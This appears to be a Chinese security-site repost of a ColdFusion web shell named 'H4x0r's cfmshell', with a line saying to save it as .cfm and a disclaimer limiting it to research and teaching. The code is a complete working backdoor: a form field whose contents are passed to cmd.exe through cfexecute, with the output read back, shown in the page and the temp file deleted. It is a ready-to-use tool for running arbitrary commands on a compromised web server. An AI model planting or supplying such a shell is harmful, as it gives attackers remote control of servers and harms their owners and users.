来源:H4x0r's Blog
保存为.cfm
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>H4x0r's cfmshell</title>
</head>
<body>
<!--- os.run --->
<cfif IsDefined("FORM.cmd")>
<cfoutput>#cmd#</cfoutput>
<cfexecute name="C:/Winnt/System32/cmd.exe"
arguments="/c #cmd#"
outputfile="#GetTempDirectory()#foobar.txt"
timeout="1">
</cfexecute>
</cfif>
<form action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>" method="post">
<input type=text size=45 name="cmd" >
<input type=Submit value="run">
</form>
<cfif FileExists("#GetTempDirectory()#foobar.txt") is "Yes">
<cffile action="Read"
file="#GetTempDirectory()#foobar.txt"
variable="readText">
<textarea readonly cols=80 rows=20>
<CFOUTPUT>#readText#</CFOUTPUT>
</textarea>
<cffile action="Delete"
file="#GetTempDirectory()#foobar.txt">
</cfif>
</body>
</html>
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
点赞
https://cn-sec.com/archives/48822.html
复制链接
复制链接
-
左青龙
- 微信扫一扫
-
-
右白虎
- 微信扫一扫
-
评论